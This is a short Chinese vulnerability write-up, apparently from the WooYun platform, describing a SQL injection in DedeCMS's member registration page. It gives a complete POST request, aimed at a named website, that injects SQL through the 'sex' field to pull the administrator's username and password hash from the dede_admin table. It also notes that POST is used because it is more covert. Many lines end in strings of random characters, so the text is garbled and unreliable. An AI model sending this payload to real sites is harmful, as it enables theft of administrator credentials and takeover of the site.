漏洞类型: SQL注射漏洞2 {# a$ [' F Q8 U) j8 N% s
简要描述:
+ E' l& t! f" g. y 4 R8 Y% Z# e9 C' o. z
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.8 Q( k/ d9 t( e1 _
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.1 S/ r/ \0 H& m% M' f) n2 T% @
详细说明:跟这个漏洞1 ~5 d; N+ b: I3 d
) V" ], L: Y6 d7 _" ^. B. f
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
9 m) f# d f8 d! H" d/ V3 ]9 M是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
& u* p: Q, }+ O/ I) GPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
, ]- @) [) l% n8 j/ O
4 I1 P* z# R+ j, i; z# Owww.political-security.com/member/reg_new.php
2 H8 F- z! l( O% Z % O5 Z" B. `, J/ H; z0 b
POST
- u' r$ p4 U0 \( [' Z7 \7 a ( `% n5 F! z+ c: x2 G2 e
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&4 Q( @5 m) n3 z2 r% _: v( o
userid=c4rp3nt3r&uname=c4rp3nt3r0 H0 R, @6 I* u( @: d+ h2 s
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
& W, r9 m; z W7 y1 R; W* }( a' f8 @&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
- E* j, r+ R) D/ V(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,''); e) ^, r. j B' E* }
%00&vdcode=glos&agree= |